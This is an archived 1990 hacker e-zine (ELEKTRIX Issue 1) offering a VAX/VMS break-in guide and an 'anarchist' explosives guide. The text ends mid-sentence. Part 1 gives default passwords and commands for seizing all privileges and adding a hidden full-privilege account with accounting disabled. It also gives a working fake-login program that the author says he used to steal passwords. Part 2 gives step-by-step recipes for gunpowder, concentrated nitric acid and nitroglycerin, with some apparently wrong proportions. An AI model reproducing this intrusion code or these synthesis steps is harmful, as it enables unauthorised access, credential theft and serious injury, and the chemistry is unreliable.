home *** CD-ROM | disk | FTP | other *** search
Text File | 2003-06-11 | 84.4 KB | 1,929 lines |
- ----------------------------------------------------------------------------
- | |
- | The Supreme Seven [S7] proudly present... |
- | |
- | ELEKTRIX Issue 1 |
- | |
- | Released May 1990 - Issue 2 in July |
- | |
- | |
- | HACKING * PHREAKING * ANARCHY * ELECTRONIC SURVEILLANCE AND PYROTECHNICS |
- | |
- | |
- | You can contact us at Palm Beach BBS ++44(303)-265979 [Email to Deceptor] |
- ----------------------------------------------------------------------------
-
- Disclaimer: In no event shall Palm Beach be liable to anyone for special,
- collateral, incidental, or consequential damages in connection with or
- arising out of the use of the information within this magazine and sole
- and exclusive liability to Palm Beach, regardless of any form of action,
- shall not exceed the purchase price of this magazine (which since it is
- nothing means we don't owe u nowt!). Moreover, Palm Beach shall not be
- liable for any claim of any kind whatsoever against the user of these text
- materials by any other party. Palm Beach makes no warranty, either exp-
- ressed or implied, including but not limited to any implied warranties of
- merchantability and fitness for particular purpose, regarding these text
- materials and makes such materials available solely on an 'as-is' basis.
- Now that that's over with - PARTY!
-
- Well now, this is the first issue of many ELEKTRIX newsletters covering
- such topics as COMPUTER SECURITY, HACKING, PHREAKING, SAT DECODING, RTTY
- ENCODED CRACKING, MAG.STRIP ENCRYPTION AND SUPPLIES, THE ANARCHISTS GUIDES,
- PYROTECHNICS, ELECTRONIC SURVEILLANCE AND ELECTRONIC FRAUD.
- In this issue there are articles on Hacking, Phreaking, Pyrotechnics,
- anarchy and electronic surveillance. The newsletter is bi-monthly and so
- the next issue will be out in July. You can 'pickup' a copy of ELEKTRIX at
- any of these boards around the world:
-
- HACKERNET (UK) ++44(532)-557739
- PALM BEACH BB (UK) ++44(303)-265979
- THE LIMELIGHT BBS (USA) 0101-203-834-0367
- THE PIRATES HAVEN + THE WAREHOUSE BB (EUROPE)
-
- If you have an article or some information which you would like to see
- put to use in the next issue then you can contact us at Palm Beach BBS UK.
- Please send all e-mail to Deceptor. Higher priviledges available to hackers
- , phreakers, etc. You can contact S7 at these places too:
-
- TCHH - Maxhack/Deceptor/Pop
- QSD - Alex/Maxhack/Deceptor
- GHOST - Mail to S7/Deceptor
-
-
- ■ Part 1 - Hacking VMS - UAF / False Logon programs, etc. / Pling Wiz
-
- ■ Part 2 - The Anarchists guide to...pyrotechnics & mischief / Deceptor
-
- ■ Part 3 - An guide to modern electronic surveillance / Technic
-
- ■ Part 4 - Make your own tonepad for phone box phreaking / Maxhack
-
- ■ Part 5 - Freefone interrogation.....The ultimate in lists. / Agent 7
-
-
- ---------------------- ELEKTRIX ISSUE 1: MAY 1990 ---------------------------
-
-
- ----------------------------------------------------------------------------
- | |
- | ELEKTRIX Issue 1 - Part 1 |
- | ~~~~~~~~~~~~~~~~~~~~~~~~~ |
- | |
- | Hacking VAX/VMS + The User Authorisation File |
- | By Pling Wiz |
- | |
- | PALM BEACH BBS UK ++44(303)-265979 |
- | |
- ----------------------------------------------------------------------------
-
-
-
- INTRODUCTION
-
- The VAX is made by DEC (Digital Equipment Corp) and can run a variety
- of operating systems. In this file i will talk about the VMS (Virtual
- Memory Operating System), VMS also runs on the PDP-11, both mainframes
- are 32 bit machines with 32 bit virtual address space.
-
- ENTRANCE:
-
- When you first connect to a VAX you type either a return, a ctrl-c or
- a ctrl-y. It will then respond with something similar to this:
-
- USERNAME:
- PASSWORD:
-
- The most frequent way of gaining access to a computer is by using a
- 'default' password, this by the way is not very successful.......
- When DEC sells a VAX/VMS, the system comes equipped with 4 accounts
- which are:
-
- DEFAULT : This serves as a template in creating user records in the
- UAF (User Authorization File). A new user record is assigned
- the values of the default record except where the system
- manager changes those values. The default record can be
- modified but can not be deleted from the UAF.....
-
- SYSTEM : Provides a means for the system manager to log in with full
- privileges. The SYSTEM record can be modified but cannot be
- deleted from the UAF.......
-
- FIELD : Permits DIGITAL field service personnel to check out a new
- system. The FIELD record can be deleted once the system is
- installed.
-
- SYSTEST: Provides an appropriate environment for running the User
- Environment Test Package (UETP). The SYSTEST record can be
- deleted once the system is installed.
-
- Usually the SYSTEM MANAGER adds,deletes, and modifies these records
- which are in the UAF when the system arrives, thus eliminating the
- default passwords, but this is not always the case.....
- some default passwords which have been used to get in a system are....
-
- USERNAME PASSWORD
-
- SYSTEM MANAGER or OPERATOR
- FIELD SERVICE or TEST
- DEFAULT USER or DEFAULT
- SYSTEST UETP or SYSTEST
-
- Other typical VMS accounts are :
- VAX
- VMS
- DCL
- DEMO
- GUEST
- GENERAL
- TEST
- HELP
- GAMES
- DECNET
-
- Or a combination of the various usernames and passwords. If none of
- these get you in , then you should try another system unless you have
- away of getting an account either by trashing or other means.....
-
- YOUR IN!!!!!!
-
- You will know that you are in by receiving the prompt of a dollar sign
- ($). You will be popped into the default directory which is dependent
- on what account you logged in as. If you get in as system manager
- (highly unlikely) you have full access....
- If you get the FIELD or SYSTEST account , you may or may not have full
- access, but you may have the privileges to give your self full access.
-
- To give privs to yourself:
-
- $ SET PROCESS/PRIVS=ALL
-
- The VMS system has full help files available by typing HELP. You can
- use the wildcard character of an '*' to list out info on every
- command:
- $ help *
-
- When you first logon, it may be to your advantage to get a list of all
- users currently logged onto the system if there are any at all. You
- can do this by:
-
- $ SHOW USERS
-
- VAX/VMS Interactive Users-Total=4
- 01-may-1989 11:37:21.73
- 0PAO: DEMO 004C004C
- TTD2: FIELD 004E02FF
- TTD1: SYSMAN 0043552E
- TXB3 TRTRTRRTR 01190057
-
- It is highly recommended that if you are logged on in the day and
- there are people logged in, especially the system manager or the
- account you are logged on as appears twice.. log out straight away,
- and call back later. You do not want to call to late though as the
- system keeps a record of when each user logs in and out.
-
- To communicate with other users or other hackers that are on the
- system, use the PHONE utility..
-
- $ PHONE Username
-
- If the system has DEC-NET you can see what available nodes there are
- by :
-
- $ SHOW NETWORK
-
- If you have mail the system will tell you as soon as you logon, simply
- type:
-
- $ MAIL
-
- This will invoke the Personal Mail Utility, you can then either read
- your mail or select help....
-
- DIRECTORIES:
- To see what you have in your directory type:
-
- $ DIR
-
- To get a list of directories on the system type:
-
- $ DIR *.*
-
- When a VAX/VMS is first installed, it comes with 9 directories which
- are not listed when you execute the DIR *.* command:
-
- <SYSLIB>
- This directory contains various macro and object libraries.
-
- <SYSMSG>
- This directory contains files used in managing the operating system.
-
- <SYSMGR>
- This directory contains text files and help libraries for the HELP
- library.
-
- <SYSERR>
- This is the directory for the error log file (ERRLOG.SYS).
-
- <SYSTEST>
- This directory contains files used in testing the functions of the
- operating system.
-
- <SYSMAINT>
- This directory contains system diagnostic programs.
-
- <SYSUPD>
- This directory contains filesused in applying system updates.
-
- <SYSUPD.EXAMPLES>
- This directory contains sample driver programs, user-written system
- services, and other source programs.
-
- <SYSEXE>
- This directory contains the executable images of most of the functions
- of the operating system.
- Inside these directoriesare files with the following file types:
-
- File-Type: Description: command:
- --------------------------------------------------------------------
- .hlp system help file TYPE filename
- .dat data file TYPE filename
- .msg message file TYPE filename
- .doc Documentation TYPE filename
- .log LOG file TYPE filename
- .err ERROR msg file TYPE filename
- .seq sequential file TYPE filename
- .sys system file FILE-NAME
- .exe executable file FILE-NAME
- .com command file COMMAND NAME
- .bas basic file RUN file-name
- .txt ascii text file TYPE filename
- --------------------------------------------------------------------
- There are others but you won't see them as much as the above. You can
- change the directories either by using the CHANGE command or by using
- the SET DEFAULT command:
-
- $ CHANGE <DIR.NAM>
- or
- $ SET DEFAULT <DIR.NAM>
-
- You can now list and execute the files in this directory without first
- the directory name followed by the filename as long as you have
- sufficient access. If you don't have sufficient access you can still
- view files within directories that you cannot default to by:
-
- $ TYPE <LOD.DIR> LOD.MAI;1
- This will list the contents of the file LOD.MAI;1 in the directory of
- <LOD.DIR>
-
- The use of wildcards is very helpful when you desire to view all the
- mail or something on the system. To list out all the users mail if you
- have access type:
-
- $TYPE <*.*>*.MAI;*
-
- As you may have noticed mail files have the extension of MAI at the
- end. The ;1 or ;2 etc are used to number files with the same name.
-
- PRIVILEGES
-
- Privileges fall into 7 categories according to the damage that the
- user possessing them could cause to the system:
-
- NONE - No privileges
-
- NORMAL - minimum privileges to use the system.
-
- GROUP - Potential to interfere with members of the same group.
-
- DEVOUR - Potential to devour noncritical system-wide resources.
-
- SYSTEM - Potential to interfere with normal system operation.
-
- FILE - Potential to comprimise file security.
-
- ALL - Potential to control the system (wouldn't that be good ahah).
-
- THE UAF
-
- The User Authorization File contains the names of the users who may
- log into the system and also contains a record of the users
- privileges. Each record in the UAF includes the following:
-
- 1. Name and Password.
- 2. User Identification Code(UIC)-- Identifies a user by a group number
- and a member number.
- 3. Default file specification --- Has the default device and directory
- names for file access.
- 4. Login command file --- Names a command procedure to be executed
- automatically at login time.
- 5. Login flags --- Allows the system manager to inhibit the user of
- the ctrl-y functions and lock user passwords.
- 6. Priority ---- Specifies the base priority of the process created
- by the user at login time.
- 7. Resources --- Limits the system resources the user may perform.
- 8. Privileges --- Limits the activities the user may perform.
-
- If you have SYSTEM MANAGER privileges, you will be able to add,delete,
- and modify records in the UAF.
-
- The AUTHORIZE Utility allows you to modify the information in the UAF.
- It is usually found in the SYSEXE directory.
- The commands for AUTHORIZE are:
- ADD Username <qualifier..> Adds a record to the UAF.
- EXIT (or CTRL-Z) Returns you to command level.
- HELP Lists the AUTHORIZE commands.
- LIST <Userspec></FULL> Creates a listing file of UAF records.
- MODIFY Username Modifies a record.
- REMOVE Username deletes a record.
- SHOW Displays UAF records.
-
- The most useful besides ADD is the SHOW command. SHOW displays reports
- for selected UAF records. YOU can get a /BRIEF listing of a /FULL
- listing. BUT before you do that, you may want to make sure no one is
- logged on besides you,to make sure know one can log on type the
- following:
-
- $ SET LOGINS /INTERACTIVE=0
-
- This establishes the max number of users able to log in to the system,
- this command does not affect users currently logged on.
-
- To list out the userfile do the following:
-
- $ SET DEFAULT <SYSEXE>
- $ RUN AUTHORIZE
- UAF> SHOW * /BRIEF
-
- UAF
- Unfortunately you cannot get a listing of passwords,though you can get
- a listing of all the users as shown above... The passwords are
- encrypted just like the unix systems.
- If you have sufficient privs you can create your own account.........
-
- UAF> ADD <Username> /PASSWORD=HACKER /UIC=<014,006> /CPUTIME=0
- /DEVICE=SYS$ROOT_/ACCOUNT=VMS /DIRECTORY=<SYSERR> /PRIVS=ALL
- /OWNER=DIGITAL /NOACCOUNTING
-
- 1. ADD USERNAME
- 2. SPECIFY THE PASSWORD YOU WANT TO USE....
- 3. ASSIGN A UIC CONSISTS OF 2 NUMBERS FROM 0 TO 377 SEPERATED BY A
- COMMAND ENCLOSED IN BRACKETS....
- 4. CPUTIME IS IN DELTA FORMAT, 0 MEANS INFINITE......
- 5. SPECIFY THE DEVICE THAT IS ALLOCATED TO THE USER WHEN THEY LOGIN.
- OTHER DEVICES ARE SYS$DEVICE,SYS$SYSDISK ETC..
- 6. SPECIFYING AN ACCOUNT IS NOT REALLY NECCESSARY
- 7. PRIVS YOU ARE GOING TO WANT ALL THE PRIVS AREN'T YOU???
- 8. VERY IMPORTANT.... NOACCOUNTING WILL DISABLE THE SYSTEM ACCOUNTING
- RECORDS,THUS NOT ADDING INFORMATION TO THE ACCOUNTING.DAT FILE.
-
-
- LOGGING OFF
- Simply type:
- $ LOGOUT
-
-
- BYPASSING THE UAF...
- =====================
-
-
- The preferred method of breaking into a locked system is to set the alternat
- UAF. This method requires setting the system parameter UAFALTERNATE, which
- defines the logical name SYSUAF to refer to the file SYS$SYSTEM:SYSUAFALT.DA
- If this file is found during a normal login, the system uses it to validate
- the account and prompts you for the username and password.
- If this file is not located, the system assumes that the UAF is corrupt and
- accepts any username and password to log you into the system from the system
- console. Logins are prohibited from all other locations.
-
- NOTE: You can only use this method to log into the system from the console
- terminal; you cannot use the other terminal lines.
-
- To set the alternate UAF ,use the following procedure:
-
- 1: Perform a conversational boot..
- 2: When the SYSBOOT > prompt appears, enter the following
- SYSBOOT > SET UAFALTERNATE 1 <cr>
- 3: Type CONTINUE and press <cr>
- 4: When the start up procedure completes, log in on the console terminal by
- entering any username and password when asked to..
-
- The system assigns the following values to your user account:
-
- NAME.................. Username.
- UIC................... [001,004].
- COMMAND INTERPRETER... DCL.
- LOGIN FLAGS........... None.
- PRIORITY.............. Value of system parameter (DEFPRI).
- RESOURCES............. Value of the PQL system parameters.
- PRIVILEGES............ ALL.
-
- The process name is usually the name of the device on which you logged in
- EG opa0..
-
- 5: Fix the problem that caused you to be locked out of the system. That is,
- make the necessary repairs to the UAF or to the start up or login
- procedures . (If you modify a login or startup procedure and the problem
- is still not solved, restore procedure to its previous state.
-
- If the problem is a forgotten password, reset the UAFALTERNATE system param
- to 0, as explained in the next step. Then enter the authorize utility and
- then type HELP MODIFY for info on modifying passwords...
-
- 6: Clear the UAFALTERNATE parameter by running SYSGEN and using SYSGEN
- commands. To run SYSGEN, enter the following commands at the DCL prompt:
-
- $ RUN SYS$SYSTEM:SYSGEN <CR>
-
- The SYSGEN prompt is then displayed, then enter the following commands:
-
- SYSGEN > SET UAFALTERNATE 0 <CR>
- SYSGEN > WRITE CURRENT <CR>
- SYSGEN > EXIT <CR>
-
- 7: Shutdown and reboot the system.
-
- Emergency startup after modifying system paramaters.
-
- In some cases, modifying system parameters may cause the system to become
- unbootable. If this occurs, use the following emergency startup procedure
- to restore normal operation.....
-
- 1: Perform a conversational boot....
- 2: When the SYSBOOT > prompt appears enter the following commands:
- SYSBOOT > USE DEFAULT.PAR <CR>
- SYSBOOT > CONTINUE <CR>
- 3: When the system finishes booting, review any changes you made to SYSGEN
- parameters, modify MODPARAMS.DAT as necessary and re execute AUTOGEN.
-
-
- BYPASSING STARTUP AND LOGIN
- ===========================
-
- If the system does not complete the startup procedures or does not allow you
- to log in , bypass the startup and login procedures by following these steps
-
- 1: Perform a conversational boot..
- 2: define the console to be the startup procedure by entering the following
- commands at the SYSBOOT > prompt:
- SYSBOOT > SET/STARTUP OPA0:
- Type continue and press <CR> in response to the next SYSBOOT > prompt.
- Wait for the DCL prompt to return.....
- 3: Correct the error condition that caused the login failure. That is, make
- the necessary repairs to the startup or login procedures, or to the UAF.
- You may want to enter the following DCL commands because bypassing the
- startup procedures leaves the system in a partially initialized state:
-
- $ SET NOON <CR>
- $ SET DEFAULT SYS$SYSROOT:[SYSEXE] <CR>
-
- Invoke a text editor to correct the startup or login procedure file. Note
- that some system consoles may not supply a screen mode editor.
-
- 4: Reset the startup procedure by invoking SYSGEN and entering the following
- commands:
-
- $ RUN SYS$SYSTEM:SYSGEN <CR>
- SYSGEN > SET/STARTUP SYS$SYSTEM:STARTUP.COM <CR>
- SYSGEN > WRITE CURRENT <CR>
- SYSGEN > EXIT <CR>
-
- 5: Perform a normal startup by entering the following command:
-
- $ @SYS$SYSTEM:STARTUP <CR>
-
- To perform an orderly shutdown of the system, invoke SHUTDOWN.COM from
- any terminal and any priveleged account with the following DCL command:
-
- $ @SYS$SYSTEM:SHUTDOWN <CR>
-
-
- EMERGENCY SHUTDOWN WITH OPCRASH
- ===============================
-
- This describes how to halt the system immediately without performing any of
- the functions that ensure an orderly shutdown. You use the OPCRASH procedur
- only if SHUTDOWN.COM FAILS......
-
- To perform this procedure you must have CMKRNL privilege. You can enter the
- commands from ANY terminal.
-
- 1: Enter the following command to force an immediate shutdown of the system
-
- $ RUN SYS$SYSTEM:OPCRASH <CR>
-
- 2: At the system console the following message is displayed
- SYSTEM SHUTDOWN COMPLETE - USE COBSOLE TO HALT SYSTEM.
-
- 3: Halt the system
- e.g. emergency shutdown using opcrash...
-
- $ RUN SYS$SYSTEM:OPCRASH <CR>
-
- GENERAL MAINTENANCE OF THE UAF.
- ===============================
-
- To disable an account use the following command:
-
- UAF > MODIFY USERNAME/FLAGS=DISUSER <CR>
-
- The login flag disuser disables the account and prevents anyone from loggin
- into the account.
- To enable the account when it is needed, run AUTHORIZE and specify the
- following command:
-
- UAF > MODIFY USERNAME/FLAGS=NODISUSER <CR>
-
-
- MODIFYING A USER ACCOUNT.
- =========================
-
- Use the AUTHORIZE command MODIFY to change any of the fields in an existing
- user account. The following command is used to change a users password.
-
- UAF> MODIFY USERNAME/PASSWORD=NEWPASSWORD <CR>
-
-
- LISTING USER ACCOUNTS.
- ======================
-
- Use the AUTHORIZE command LIST to create the file SYSUAF.LIS containing a
- summary of all user records in the UAF, as follows:
-
- UAF > LIST <CR>
-
- %UAF-I-LSTMSG1, WRITING LISTING FILE
- %UAF-I-LSTMSG2, LISTING FILE SYSUAF.LIS COMPLETE.
-
- By default the LIST command produces a brief report containing the followin
- info from the UAF:
-
- ACCOUNT OWNER,USERNAME,UIC,ACCOUNTNAMES,PRIVILEGES,PROCESS PRIORITY,
- DEFAULT DISK AND DIRECTORY.
-
- Use the /FULL qualifier to create a full report of all the info contained
- within the UAF.....
-
-
- ENABLING SECURITY ALARMS.
- =========================
-
- To enable security auditing, specify the dcl command SET AUDIT in the
- following format:
-
- $ SET AUDIT/ALARM/ENABLE = KEYWORD [...]
-
- Select the events to be audited by specifying one or more of the keywords
- to the /ENABLE qualifier....
-
- ACL.......... Event requested by an acl on a file or global section..
- ALL.......... All possible events..
- AUDIT........ Execution of the SET AUDIT command..
- AUTHORIZATION modifications to the system UAF file, network proxy,
- authorization file,rights database, or changes to system
- and user passwords..
- BREAKIN...... Successful breakin attempt..
- FILE ACCESS.. Selected types of access (privileged + non privileged) to
- files + global sections..
- INSTALL...... Installation of images..
- LOG FAILURE.. Failed login attempt..
- LOGIN........ Successful login attempt..
- MOUNT........ Volume mounts + dismounts..
-
-
- ENABLING ALARM MESSAGES
- =======================
-
- After you enable a security operator terminal, enable specific alarm events
- with the SET AUDIT/ENABLE qualifier. Alarm messages are then sent to the
- security operator terminal when the selected events occur.
-
-
- AUDIT REDUCTION FACILITY.
- =========================
-
- If you have enabled security alarms, the operating system writes the
- information about these alarms to the security operators log file. To
- extract all of the security alarm info from the current operators log file
- (SYS$MANAGER:OPERATOR.LOG) execute this command:
-
- $ @SYS$MANAGER:SECAUDIT <CR>
-
- Output from SECAUDIT is displayed on SYS$OUTPUT. If you want to write the
- records to a file, include the file spec with the /OUTPUT qualifier..
- The following command writes the records to the file BREAKINS.DAT in the
- user current directory..
-
-
- $ @SYS$MANAGER:SECAUDIT/OUTPUT=BREAKINS.DAT
-
-
- SIMPLE DECOY PROGRAM
- ~~~~~~~~~~~~~~~~~~~~
-
- This is a decoy program that runs on the vax/vms system..
- It does work because i have used it at the local college of FE, to steal
- passwords and accounts whilst working there....
-
- The program now follows:-
-
- $ clear
- $ set term/noecho/notype
- $ SYSNAM:=(nodename)
- $begin:
- $ read/error=begin/prompt="" sys$command ret
- $ write sys$output ""
- $ID:
- $ wait 00:00:00.5
- $ write sys$output "*** ''SYSNAM' VAX/VMS SYSTEM ***"
- $ write sys$output ""
- $ write sys$output ""
- $ wait 00:00:01
- $ set term/echo
- $ askquest:
- $ read/error=fail/end=eof/prompt="USERNAME: "/time=20 sys$command quest
- $ if f$edit(quest,"upcase") .eqs. "SYBIL" then SYSNAM:=SYBIL
- $ if f$edit(quest,"upcase") .eqs. "SYBIL" then goto ID
- $ if quest .nes. "" then goto askpass
- $eof:
- $ write sys$output "Error reading command input"
- $ write sys$output "End of file detected"
- $ goto begin
- $fail:
- $ write sys$output "Error reading command input"
- $ write sys$output "Timeout period expired"
- $ goto begin
- $askpass:
- $ set term/noecho
- $ read/error=eof/end=eof/prompt="PASSWORD: " sys$command pass
- $ set term/echo
- $ open/write file data.dat
- $ write file quest
- $ write file pass
- $ write file f$time()
- $ close file
- $ set term/lowercase
- $ write sys$output "User authorization failure"
- $ read/error=begin/prompt ="" sys$command ret
- $ stop/id='f$getjpi("","PID")
-
- Notes about use...
-
- 1... change the welcoming message of the program to what is actually seen
- on your vax...
-
- 2... why not put at the top of the program the logout procedure of someone
- else.. because a blank screen looks a bit suspicious...
- just copy the log out statement and put it between a sys$output command
- in the program .. not forgetiing to take the clear command out haha
-
-
- ------------------- Palm Beach BBS ++44(303)-265979 ------------------------
-
- ----------------------------------------------------------------------------
- | |
- | ELEKTRIX Issue 1 - Part 2 |
- | ~~~~~~~~~~~~~~~~~~~~~~~~~ |
- | |
- | The Anarchists guide to...Pyrotechnic mischief |
- | by Deceptor |
- | |
- | PALM BEACH BB UK ++44(303)-265979 |
- | |
- ----------------------------------------------------------------------------
-
- MDA - (3-4-methylendioxyphenylisopropylamine) takes u higher!
-
-
- Welcome to this, Issue 1 of Elektrix, and with it Part 1 of the 'anarchists
- guide to...' This first file will contain basic information on pyrotechnics
- and other 'bits n pieces' useful for a good laugh.
-
- In this file you will find information on how to make the following:
-
- Fuse Paper
- Auto-Firelighters
- Low-explosive: Gunpowder
- Hi-explosive : Nitro-Glycerin
- Hot Stuff
-
-
- FUSE PAPER
-
- Useful for making the fuses for bangers (firecrackers) and other slow-burn
- fuse applications.
-
- You will need: Sodium Chlorate - Go to your local gardenshop/centre and ask
- for some Sodium Chlorate weedkiller. You're
- meant to be 18 by law but if you're not it
- doesn't usually stop them selling you it.
-
- Newspaper/Tracing Paper
-
- The Sodium Chlorate in the weedkiller is unlikely to be more than about 65%
- pure - this is not a problem if you're not worried about how quickly it will
- burn as fuse paper but if you are using the fuses in a lot of wind or are
- going to through them as part of a firecracker you will have to concentrate
- the Sodium Chlorate and remove impurities as much as possible beforehand as
- follows:
-
- Make a saturated solution of the weedkiller (ie.dissolve as much of it
- as you can in very hot water) then filter off any remaining crystals.
- Then heat the solution very hot in a dish - then when crystals start
- forming around the rim heat more gently and then leave to cool - after
- some time u will have crystals with gunge all over them - wash them and
- filter off any rubbish.
-
- This is really simple to make but quite effective...Just take the Sodium
- Chlorate (pure or weedkiller) and then make a solution of it (put in water).
- Then soak the paper in the water and leave to dry on a radiator.
-
- When the paper is dry it will burn with some loud pops and just as fusepaper
- so you have made your own fuses. Now to put the fuses to work....(hehe)
-
-
-
- GUNPOWDER
-
- Gunpowder is great stuff - though not really as exciting as plastic or
- high-explosive it can be good fun for fireworks, bangers and not so large
- explosions.
-
- You will need: Sulphur - Obtain this from your chemist. Yup! Just ask
- for 'flowers of sulphur' (what a stupid name
- for it!)
-
- Carbon - Best just to use crushed charcoal for this.
-
- Potassium - Get this from a gardenshop (ask for Saltpetre).
- Nitrate Can also use Sodium Nitrate in 'Weedol weed-
- killer' - but not actually as good.
-
- Making gunpowder from this is just too easy.....Just grind each substance
- until it is a fine powder....then mix them in the following ratio:
-
- Potassium Nitrate : Sulphur : Carbon
- 1 : 3 : 7
-
- Once mixed well you have made gunpowder - pack it in a confined space - add
- a fuse with the FUSE PAPER as shown above and you have a 'low-explosive'. It
- can be great fun. If you want to light the gunpowder with a short delay of
- about twenty seconds or so without the need for matches or lighters then use
- a FIRELIGHTER as shown next.
-
-
-
- FIRELIGHTER
-
- Not really much to this but useful for delayed firelighting with the use of
- matches or lighting materials.
-
- You will need: Glycerin - Get it from your kitchen/medicine drawer.
-
- Potassium - This is now more commonly referred to as
- Permanganate potassium (vii) manganate and can be picked
- up at the chemist. If they ask you what you
- want it for just say 'water-purification'.
-
- Sugar - If you can't get this; you really are lame!
-
- Ok. Take the stuff separately in the following proportions:
-
- Glycerin : Potassium Permanganate : Sugar
- 3 : 9 : 1
-
- Crush the sugar and the glycerin up real well (icing sugar works well) then
- just pour the glycerin on top and watch - change the proportions a bit and
- you can have some real fun - try putting a bit of Sulphur in! Hehehehe You
- can also use this as a detonator for a low-explosives such as gunpowder as
- it doesn't go out easily!!! Also if you get a lot of it and a good ratio it
- can be used as a good smoke bomb for indoors since you can run off and it's
- not going then a minute later there's sweet smoke * EVERYWHERE * and phuck
- it doesn't set most smoke alarm detectors off!
-
-
-
- NITROGLYCERIN
-
- Contrary to what people may have told you:
-
- 1) It's very easy to make (if you have the fractional distillation gear).
- 2) It doesn't blow up when you drop it - cos homemade isn't usually pure
- enough.
-
- Ok. You will need: Sulphuric Acid - Go to a garage and ask for some battery
- acid or crack open a battery (dumper
- truck batteries are cool - can give 400
- amps current output!!! Whew!) You can
- sometimes get it at harbours.
-
- Sodium Nitrate - Weedkiller - this time get the 'WEEDOL'
- one with Sodium Nitrate in it or any one
- with Sodium Nitrate.
-
- Glycerin - From kitchen as before.
-
- Now the thing with this is that in order to actually MAKE nitroglycerin you
- will need Conc.Nitric acid and Conc.sulphuric as well as the glycerin. The
- sulphuric is easy to do - battery acid is roughly 69% pure - the rest being
- water. The best way to get conc. sulphuric therefore is to heat the acid to
- * VERY * hot (400 degrees plus) and then leave it for a long time until its
- acidity increases a great deal (like well nasty!). Get a litre of Sulphuric
- acid concentrated and store it in a glass bottle. [Wash yer hands too - its
- not nice stuff].
-
- Now getting the Nitric acid in any form is well difficult unless you have
- access to it at college/work etc. The best way I've found is to take Sodium
- Nitrate weedkiller and do the following:
-
- 1) Purify the Sodium Nitrate from the weedkiller by making a saturated soln.
- and then crystallizing it and washing the crystals and filter off any
- nasties...Now you have Sodium Nitrate (reasonably pure).
-
- 2) Then take the Sodium Nitrate crystals and crush them into a powder or as
- close as you can get.
-
- 3) Now you want to sort of extract the nitrate - for this you will need fair
- distillation equipment. You are attempting to make Nitric Acid from the
- Sodium Nitrate by reacting it with some of the Sulpluric acid which was
- concentrated from before.
-
- i) Pour Sulphuric acid in here
- ||
- |D2|___ D5 <- Nasty gases will be coming out of
- Put the | _ \ ______ || here - Nitrogen Dioxide (toxic!!!)
- Sodium | / \ \D3 | ___ \ ||
- Nitrate | | \ \___| | _| |_||_
- crystals | | \------| | | | || | <----- Clear container with Nitrogen
- in here /D1\ /\ |-| |----| Dixode bubbling through the
- ----> \__/ || |___D4___| water to turn it to Nitric Acid
- HEAT ||
- That is a cooling bracket (yeh I know it looks nothing like one but thats
- life with TXT files!)...I hope that solves confusion over the following
- instructions...Bet it doesn't! hah
-
- ii) Right assemble the distillation/fractional distillation equipment or
- homemade equipment if that's what you've done as shown above.
-
- iii) Put the Sodium Nitrate crystals in the flat bottomed flask (D1) and
- you may want to put some anti-bumping granules in too (tiny bits of
- glass).
-
- iv) Don't connect D4 or D5 at this time - just a bowl to get any crap that
- comes off early.
-
- v) Start pouring in the Sulphuric Acid(D2) and keep the mixture hot so the
- reaction is real good. When it gets to around 79 degrees (I think) or
- so then a red sort of mist comes about inside the equipment - don't
- run like phuck away but be worried all the same since you have to move
- fast now.....Connect D4 and D5 and make sure you don't breathe in any
- of the red smoke (Nitrogen Dioxide) [If you wanna intoxicate yerself
- then read my third Anarchists guide on....chemical weapons (dioxins)].
- (It's probably best to make sure you don't breathe the crap in by add-
- ing a second D4 thing on the end of D5 to filter off as much vapour as
- possible).
-
- vi) Once that's all over then you will have a nice concentrated nitric acid
- in D4.....
-
- [BTW - Remember to keep the cooling bracket D3 real cool with fresh cool run
- ning water - or you won't get much at all].
-
-
- NOTE: IT'S BEST TO STORE NITRIC ACID WHEN CONCENTRATED IN STEEL CONTAINERS
- WHICH CAN RESIST THE CORROSIVE ACTION....USE GLOVES AT ALL TIMES...
-
-
- 4) Ok so now you have Sulphuric acid conc., Nitric acid conc. and glycerin.
- Now for the difficult bit! (Haha You thought the worst was over)
-
- 5) Right this is a *** VERY *** dangerous bit.........
-
- DON'T DO IT INDOORS...OR IN THE GARAGE - DO IT IN AN ISOLATED FIELD NEAR
- YER HOUSE...IF YOU DON'T HAVE ONE THEN USE YER NEIGHBOURS GARDEN...
-
- Get a wooden tray or box and fill it with ICE....make sure there's always
- ice to stack it up - it * MUST * remain cool. Then get a conical flask
- (phuck a round-bottomed one)...and a thermometer measuring up to 100 C.
-
- Balance the flask carefully and securely in the ice bath and put the
- thermometer in.
-
- Get the Sulphuric, Nitric and glycerin in the following proportions:
-
- Glycerin : Conc.Nitric : Conc.Sulphuric
- 3 : 1 1
-
- I recommend using 1/2 litre quantities of both acids for the first batch.
-
-
- 6) WARNING: You are using conc.acids - they do not like water - they will
- blow you up if you mistreat them by feeding them water - Make sure all
- parts inside the equipment are PHUCKING dry.
-
- Put the nitric acid into the flask and then * VERY * slowly pour in the
- sulphuric acid whilst watching the temperature....(use a dropper).
-
- MAKE SURE: If the temperature ever goes about 30 degrees C then pour the
- contents of the flask into the ice bath and run like ****** PHUCK ******
-
- As the temperature rises add the glycerin with a pipette (dropper) and
- don't pour on any more until the temperature drops and is stable.
-
-
- 7) Repeat this until all the ingredients are gone......
-
- 8) Take the jar (very carefully - it's never blown up on me - but there's
- a first for everything!) with the mixture of acids in it and look at the
- bottom - there will be a layer that isn't quite colourless.....This is
- the stuff you want. [^^^^^ At the bottom]
-
- 9) Carefully take off the top acid layer with a dropper/pipette or whatever
- and store it for later use.
-
- 10) When you get near to the bottom layer (ie. Nitroglyerin) then carefully
- pour on water to wash away the acids. Then let it settle again - repeat
- this until you are satisfied that the acids are as gone as you can get
- them - four or five times.
-
- 11) Now collect the nitroglycerin in a dry jar or something and carry it back
- to your fridge in the ice bath (***** VERY CAREFULLY *****).
-
- 12) Now keep your nitroglycerin nice and cold (so it doesn't blow up your
- house when you're watching TV or on your computer).
-
-
- You can store Nitroglycerin in Kieselguhr (a type of clay) - then it's
- easier to handle and store - add a fuse and you have dynamite.
-
-
- You have now made nitroglycerin - now what to do with it?......
-
-
- USE OF NITROGLYCERIN
-
-
- Nitroglycerin is ofcourse a VERY high explosive. Not as high as good old
- tri-nitro-toluene (TNT) but you'd find it real hard to make TNT - since
- it most CERTAINLY can't be made with ordinary Sulphuric Acid.....you DO
- need fuming sulphuric acid (a totally different substance).
-
- So what to do with it?
-
- Well if you want to blow it up you're unlikely to do it without using a
- lighted fuse/detonator......it needs quite a kick to start itself off. You
- can use gunpowder if you pack in into a tight space (see earlier) but the
- best detonation cap I've come across is Mercury (ii) Fulminate - see Part3
- of 'The Anarchists guide to...' for information on this and other kinds of
